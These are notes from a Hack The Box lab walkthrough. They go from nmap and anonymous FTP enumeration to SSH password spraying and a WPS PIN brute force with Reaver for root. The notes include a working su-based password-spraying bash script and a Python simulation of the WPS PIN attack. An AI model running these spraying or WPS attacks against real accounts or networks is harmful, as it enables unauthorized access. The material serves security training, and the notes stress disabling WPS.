Wi-Fi Network Penetration Testing from Hack The Box

Jul 24, 2024

Unique Technology in VM

  • Wi-Fi networking is exposed inside the VM (Virtual Machine) itself.
  • The wireless network is simulated entirely in software; no physical Wi-Fi hardware is involved.
  • The attack targets WPS (Wi-Fi Protected Setup), a lesser-known feature of consumer access points.

WPS (Wi-Fi Protected Setup)

  • WPS offers a simpler way to join a Wi-Fi network: a client enters an eight-digit PIN instead of the passphrase.
  • A client that presents the correct PIN is handed the network's pre-shared key (the WPA/WPA2 passphrase) by the access point.
  • WPS should be disabled: the PIN exchange has well-known design flaws that make the PIN brute-forceable online.

Initial Steps

  • nmap Scan: Conducted with -sC -sV -oA wifi_network 10.10.11.247.
    • Found three open ports: FTP (port 21), SSH (port 22), and DNS (port 53).

FTP Information

  • FTP login allows anonymous access.
  • Files downloaded using wget.
  • Files examined using tools like exiftool for metadata.
  • Identified potential usernames from PDF files.

Extracting Useful Info

  • Checked various files in FTP directory for relevant info.
  • Found a tar archive (a configuration backup) and extracted it with tar xvf.
  • Found a user netadmin in the /etc/passwd file inside the extracted archive.

Potential Password

  • Wi-Fi password: very_unique_wifi_password_1, found in a wireless configuration file in the archive.
  • Password spray: created a users.txt from the usernames collected so far and sprayed the found password against SSH (port 22) with crackmapexec.
  • Successfully logged in as netadmin.

Privilege Escalation

  • Ran LinPEAS to look for privilege escalation vectors (vulnerable software, misconfigurations).
  • Found the wireless attack tool Reaver with a file capability set (cap_net_raw), which lets it open raw sockets and inject/capture frames without being root.

Reaver Tool

  • Reaver brute-forces the WPS PIN of an access point and, once the PIN is accepted, receives the WPA2 pre-shared key.
  • Command: reaver -i mon0 -b <BSSID>, where mon0 is a monitor-mode wireless interface and the BSSID is the target access point's MAC address; this recovered the Wi-Fi pre-shared key.
  • Sprayed the recovered key over the collected usernames; it was the root password, giving root access.

Script Creation

  • Created a bash script for password spraying (takes the password as its first argument and tries it, via su, against every account that has a login shell):
    #!/bin/bash
    # Usage: ./spray.sh <password>
    [ -z "$1" ] && { echo "usage: $0 <password>" >&2; exit 1; }
    # Only accounts whose shell ends in "sh" (bash, sh, zsh, ...) can log in
    users=$(awk -F: '($NF ~ "sh$"){print $1}' /etc/passwd)
    for user in $users; do
        echo "Trying password for $user"
        # Feed the password on stdin; timeout keeps a hung su from stalling the loop
        echo "$1" | timeout 2 su -c "whoami" "$user"
        if [ $? -eq 0 ]; then
            echo "Success: $user"
            exit 0
        fi
    done

  • Rewrote the same logic as a shell function defined in the interactive session, so nothing is written to disk.

In-Depth Analysis of WPS and Reaver

  • WPS PIN validation is insecure by design: the eight-digit PIN is checked in two halves (the first four digits, then the remaining three digits plus a checksum digit), and the access point signals separately whether each half was correct. An attacker therefore needs at most 10^4 + 10^3 = 11,000 guesses instead of 10^8.
  • Changed the router's WPS PIN to demonstrate the weakness on a fresh value.
  • Ran Reaver with verbose output to show the PIN being brute-forced half by half in real time.
  • Emphasized that WPS should be disabled on every router.
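The following is an added illustration of the two-half validation described above; it is not code from the original notes or from Reaver. It computes the WPS PIN checksum digit (the standard Luhn-style rule), then brute-forces a PIN against a constructed stand-in for an access point (SimulatedRegistrar, a hypothetical name) that only reports whether each half matched, which is the information a real AP leaks through its NACKs after the M4 and M6 messages. The simulation ignores the WPS lockout that some access points apply after repeated failures.

```python
"""WPS PIN checksum and half-by-half brute force (added example, not from the page)."""


def wps_checksum(seven_digits: int) -> int:
    """Checksum digit for a 7-digit WPS PIN prefix (standard WPS rule)."""
    accum = 0
    pin = seven_digits
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit PIN carries the correct checksum digit."""
    return (len(pin) == 8 and pin.isdigit()
            and wps_checksum(int(pin[:7])) == int(pin[7]))


class SimulatedRegistrar:
    """Constructed stand-in for a WPS access point (not a real AP).

    Like a real registrar it validates the PIN in two halves and answers
    differently depending on which half failed.
    """

    def __init__(self, pin: str):
        assert is_valid_pin(pin), "AP PIN must have a valid checksum"
        self._first, self._second = pin[:4], pin[4:]

    def try_pin(self, first: str, second: str) -> str:
        if first != self._first:
            return "NACK_AFTER_M4"   # first half rejected
        if second != self._second:
            return "NACK_AFTER_M6"   # first half right, second half rejected
        return "OK"                  # PIN accepted; a real AP now sends the PSK


# Naive search space vs. what the split validation leaves an attacker with.
NAIVE_SEARCH_SPACE = 10 ** 8
SPLIT_MAX_ATTEMPTS = 10 ** 4 + 10 ** 3   # 11,000


def brute_force(ap: SimulatedRegistrar):
    """Recover the PIN one half at a time. Returns (pin, attempts)."""
    attempts = 0
    first = None
    for i in range(10_000):
        attempts += 1
        cand = f"{i:04d}"
        # Any answer other than an M4 NACK means the first half was right.
        if ap.try_pin(cand, "0000") != "NACK_AFTER_M4":
            first = cand
            break
    if first is None:
        return None, attempts
    for j in range(1_000):
        attempts += 1
        # The 8th digit is never guessed: the checksum fixes it.
        check = wps_checksum(int(first + f"{j:03d}"))
        second = f"{j:03d}{check}"
        if ap.try_pin(first, second) == "OK":
            return first + second, attempts
    return None, attempts


if __name__ == "__main__":
    # 12345670 is a checksum-valid PIN (constructed demo value).
    pin, tries = brute_force(SimulatedRegistrar("12345670"))
    print(f"recovered {pin} in {tries} attempts "
          f"(worst case {SPLIT_MAX_ATTEMPTS}, naive {NAIVE_SEARCH_SPACE})")
```

The worst case is reached with the PIN 99999995: 10,000 attempts for the first half plus 1,000 for the second, exactly the 11,000 bound. This is why a rate limit or lockout on failed WPS attempts is not a fix and the feature should simply be turned off.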

Conclusion

  • Demonstrated detailed steps from initial enumeration to gaining root access via WPS attack.
  • Highlighted the importance of understanding network security tools and WPS vulnerabilities.

Key Takeaways

  • Disable WPS on all routers.
  • Use tools like nmap, ftp, wget, exiftool, LinPEAS, and Reaver for network penetration testing.
  • Ensure strong and updated security practices to safeguard against such attacks.